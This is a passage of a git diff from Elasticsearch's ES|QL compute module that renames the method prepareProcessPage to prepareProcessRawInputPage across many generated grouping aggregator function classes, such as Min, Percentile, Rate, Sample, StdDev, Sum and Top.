intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationFloatGroupingAggregatorFunction.java index a895ebc9eda6b..547f3c116a966 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationFloatGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationIntGroupingAggregatorFunction.java index f9b9934520f06..0d9433f12a379 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationIntGroupingAggregatorFunction.java @@ -57,7 +57,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationLongGroupingAggregatorFunction.java index e1693d7475c6f..c14901d857379 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationLongGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBooleanGroupingAggregatorFunction.java index 4ca346913a25b..145cf4412c88a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBooleanGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBooleanGroupingAggregatorFunction.java @@ -56,7 +56,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BooleanBlock valuesBlock = page.getBlock(channels.get(0)); BooleanVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBytesRefGroupingAggregatorFunction.java index dc721573876ab..92f79d5491ca6 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBytesRefGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBytesRefGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinDoubleGroupingAggregatorFunction.java index 3212ca644aee7..d810b06eb310e 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinDoubleGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinFloatGroupingAggregatorFunction.java index 2e7b089e7592a..a7a5e0141fcc8 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinFloatGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIntGroupingAggregatorFunction.java index 50c5e80a55b0c..3148f36936404 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIntGroupingAggregatorFunction.java @@ -57,7 +57,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIpGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIpGroupingAggregatorFunction.java index c89c1feb6790f..1dcb89c4fca55 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIpGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinIpGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinLongGroupingAggregatorFunction.java index dc92d712ddb6a..a16cd68432e8d 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinLongGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileDoubleGroupingAggregatorFunction.java index 1264bff20abf6..6ad6afb6bf8a8 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileDoubleGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileFloatGroupingAggregatorFunction.java index f844efae8d218..0af4b60c73a64 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileFloatGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileIntGroupingAggregatorFunction.java index e0dd21ecc80d1..f9a754cc6a7b8 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileIntGroupingAggregatorFunction.java @@ -60,7 +60,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileLongGroupingAggregatorFunction.java index 1baa4a662175c..b71c068bc72b8 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/PercentileLongGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateDoubleGroupingAggregatorFunction.java index 25923bf02a761..654b92f53441f 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateDoubleGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateFloatGroupingAggregatorFunction.java index 7dbe1a2de02bd..a9a577e63a289 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateFloatGroupingAggregatorFunction.java @@ -63,7 +63,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateIntGroupingAggregatorFunction.java index 4650ebf0c5bb2..e6c813635a4f8 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateIntGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateLongGroupingAggregatorFunction.java index a219a58068ea0..7c2a2f61ca79b 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/RateLongGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBooleanGroupingAggregatorFunction.java index cec8ea8b6c21a..aac76b70397c7 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBooleanGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBooleanGroupingAggregatorFunction.java @@ -60,7 +60,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BooleanBlock valuesBlock = page.getBlock(channels.get(0)); BooleanVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBytesRefGroupingAggregatorFunction.java index 60e38edd06d1f..f9b439507a09e 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBytesRefGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleBytesRefGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleDoubleGroupingAggregatorFunction.java index cd76527394432..a901a4ed385a0 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleDoubleGroupingAggregatorFunction.java @@ -60,7 +60,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleIntGroupingAggregatorFunction.java index b2cf3114fa951..68f7a7d83b414 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleIntGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleLongGroupingAggregatorFunction.java index afb1e94a23f5a..9003fa0f18e1a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SampleLongGroupingAggregatorFunction.java @@ -60,7 +60,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevDoubleGroupingAggregatorFunction.java index 7cf0ab3e7b148..fc8a09f0400df 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevDoubleGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevFloatGroupingAggregatorFunction.java index e3bbbb5d4d624..f1cb0acbd13ee 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevFloatGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevIntGroupingAggregatorFunction.java index b0c780b232fe7..96f50bc1dc4a7 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevIntGroupingAggregatorFunction.java @@ -60,7 +60,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevLongGroupingAggregatorFunction.java index 7e33a0c70c145..4a9e201d9a24c 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/StdDevLongGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumDoubleGroupingAggregatorFunction.java index 303bb3d0ff5dc..20ad84b38062a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumDoubleGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumFloatGroupingAggregatorFunction.java index 154057db5f462..84839289c5dad 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumFloatGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumIntGroupingAggregatorFunction.java index 9b5cba8cd5a89..a4da0af4aaf2e 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumIntGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumLongGroupingAggregatorFunction.java index a2969a4dddaa8..84c81abad299b 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/SumLongGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBooleanGroupingAggregatorFunction.java index 1fa211364cfcc..1746fae25bd7f 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBooleanGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBooleanGroupingAggregatorFunction.java @@ -62,7 +62,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BooleanBlock valuesBlock = page.getBlock(channels.get(0)); BooleanVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBytesRefGroupingAggregatorFunction.java 